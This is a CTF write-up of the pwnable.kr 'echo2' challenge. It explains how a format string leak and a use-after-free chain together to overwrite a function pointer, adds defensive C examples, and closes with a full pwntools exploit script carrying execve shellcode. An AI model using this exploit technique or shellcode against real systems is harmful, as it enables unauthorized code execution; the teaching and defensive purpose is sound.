Pwnable.kr echo2 writeup


ihciah@gmail.com

A format string bug (FSB) and a use-after-free (UAF) are combined in this simple problem.

Let's have a look at it.

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int *v3; // rsi@1
  _QWORD *v4; // rax@1
  int v6; // [sp+Ch] [bp-24h]@1
  _QWORD v7[4]; // [sp+10h] [bp-20h]@1

  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  o = malloc(40uLL);
  *((_QWORD *)o + 3) = greetings;
  *((_QWORD *)o + 4) = byebye;
  printf("hey, what's your name? : ", 0LL);
  v3 = (int *)v7;
  __isoc99_scanf("%24s", v7);
  v4 = o;
  *(_QWORD *)o = v7[0];
  v4[1] = v7[1];
  v4[2] = v7[2];
  id = v7[0];
  getchar();
  func[0] = (__int64)echo1;
  func_1_ = (__int64)echo2;
  func_2_ = (__int64)echo3;
  v6 = 0;
  do
  {
    while ( 1 )
    {
      while ( 1 )
      {
        puts("\n- select echo type -");
        puts("- 1. : BOF echo");
        puts("- 2. : FSB echo");
        puts("- 3. : UAF echo");
        puts("- 4. : exit");
        printf("> ", v3);
        v3 = &v6;
        __isoc99_scanf("%d", &v6);
        getchar();
        if ( (unsigned int)v6 > 3 )
          break;
        ((void (__fastcall *)(const char *, int *))func[(unsigned __int64)(unsigned int)(v6 - 1)])("%d", &v6);
      }
      if ( v6 == 4 )
        break;
      puts("invalid menu");
    }
    cleanup();
    printf("Are you sure you want to exit? (y/n)", &v6);
    v6 = getchar();
  }
  while ( v6 != 121 );
  puts("bye");
  return 0;
}

cleanup() calls free(o). So if you press 4 to exit and then cancel, o is freed but is still used in the following step when you press 2.

echo3 calls malloc(32), a request small enough that the allocator hands back the same block that cleanup() freed. Writing through it lets us modify the greetings function pointer stored at o+3*8.
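The following is an added example, not the challenge's source and not the author's code: it reconstructs the 40-byte object from the decompiled main() (24 bytes of name, then the greetings and byebye pointers at offsets 24 and 32) and shows the cleanup pattern that leaves o dangling next to a hardened cleanup that clears the pointer, so the "exit, cancel, echo" sequence from the writeup is refused instead of dereferencing freed memory. The struct, field and function names are assumptions taken from the listing.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed layout of the object main() allocates with malloc(40):
 * 24 bytes of name, then two function pointers (o+24, o+32). */
struct echo_obj {
    char name[24];
    void (*greetings)(void);
    void (*byebye)(void);
};

struct echo_obj *o;            /* the global `o` from the decompile */

static void greetings(void) { puts("hello"); }
static void byebye(void) { puts("goodbye"); }

static void init_obj(const char *name) {
    o = calloc(1, sizeof *o);
    if (o == NULL) abort();
    strncpy(o->name, name, sizeof o->name - 1);
    o->greetings = greetings;
    o->byebye = byebye;
}

/* The challenge's pattern: the chunk goes back to the allocator while the
 * global still points at it, so the next echo handler reads recycled heap
 * memory. Kept for contrast only; nothing in this file calls it. */
void cleanup_vulnerable(void) {
    free(o);
}

/* Hardened cleanup: release and clear the pointer in one place, so a later
 * use becomes a NULL check instead of a read through freed memory. */
void cleanup_fixed(void) {
    free(o);
    o = NULL;
}

/* Every handler that dereferences o must refuse once it has been released. */
int call_greetings(void) {
    if (o == NULL) {
        puts("object already released");
        return -1;
    }
    o->greetings();
    return 0;
}

/* Normal path: create, use, release. Returns 0. */
int echo_then_exit(void) {
    init_obj("demo");
    int rc = call_greetings();
    cleanup_fixed();
    return rc;
}

/* The writeup's sequence (press 4, answer n, pick an echo option) run
 * against the fixed cleanup. Returns -1 instead of using freed memory. */
int exit_cancel_then_echo(void) {
    init_obj("demo");
    cleanup_fixed();         /* "4": cleanup runs before the y/n prompt */
    /* "n": main() loops back to the menu with o already released */
    return call_greetings(); /* "1"/"2"/"3" would dereference o here */
}
```

The point of clearing the pointer is that the allocator's reuse of the 32-byte request by echo3 no longer matters: the handlers never reach the recycled chunk because the NULL check runs first.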

Since NX is disabled, our shellcode can be written into the name, and we can leak its address through the FSB. After that, just overwrite greetings and trigger it to get a shell.
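As an added example (not the challenge's code and not the author's), the block below contrasts the defect behind the "FSB echo" leak, user input passed as the printf format string, with the fixed call that passes it as a "%s" argument. snprintf into a buffer stands in for printf so the two results can be compared; the function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable shape: the input is the format string, so every % directive
 * in it is interpreted. The call goes through a function pointer only to
 * keep the compiler's format-security warning out of this demo; the
 * defect is the same as calling snprintf(out, outsz, input) directly. */
int echo_vulnerable(const char *input, char *out, size_t outsz) {
    int (*fmt_fn)(char *, size_t, const char *, ...) = snprintf;
    return fmt_fn(out, outsz, input);
}

/* Fixed shape: the format is a literal and the input is an argument, so
 * "%10$p" comes out as exactly those five characters. */
int echo_fixed(const char *input, char *out, size_t outsz) {
    return snprintf(out, outsz, "%s", input);
}

/* Returns 1 when echo_fixed reproduces the input byte for byte. */
int fixed_echo_is_literal(const char *input) {
    char buf[128];
    echo_fixed(input, buf, sizeof buf);
    return strcmp(buf, input) == 0;
}

/* Returns 1 when the vulnerable echo changed the input, i.e. a directive
 * was interpreted. Probe it only with "%%": that is the one directive that
 * consumes no argument, so the demo never reads past the stack frame. */
int vulnerable_echo_interprets(const char *input) {
    char buf[128];
    echo_vulnerable(input, buf, sizeof buf);
    return strcmp(buf, input) != 0;
}
```

Compiling with -Wformat-security (on by default in several distributions' gcc builds) flags the non-literal format at the call site; the fixed form is the one-line change that removes the whole bug class, independent of whether NX or ASLR is enabled.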

# shellcode: https://www.exploit-db.com/exploits/36858/
# ihciah@gmail.com
# pwntools script (Python 3 / bytes syntax)
from pwn import *

# 23-byte execve("/bin//sh") shellcode, fits in the 24-byte name buffer
shellcode = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56"
shellcode += b"\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
# format string that prints the 10th stack argument as a pointer
leak = b"%10$p"
# sh = process("/home/c/ctf/echo2")
sh = remote("pwnable.kr", 9011)
sh.recvuntil(b":")
sh.sendline(shellcode)              # name = shellcode
print(sh.recvuntil(b"> "))
sh.sendline(b"2")                   # FSB echo
sh.recvline()
sh.sendline(leak)
addr = sh.recvline().strip()
assert addr.startswith(b"0x")
name = int(addr, 16) - 0x20         # leaked stack pointer - 0x20 = address of name buffer
sh.recvuntil(b">")
sh.sendline(b"4")                   # exit: cleanup() frees o
sh.sendline(b"n")                   # cancel: o is now dangling
sh.recvuntil(b">")
sh.sendline(b"3")                   # UAF echo: malloc(32) reuses the freed chunk
sh.recvline()
sh.sendline(b"A" * 24 + p64(name))  # overwrite greetings (o+24) with the name address
sh.interactive()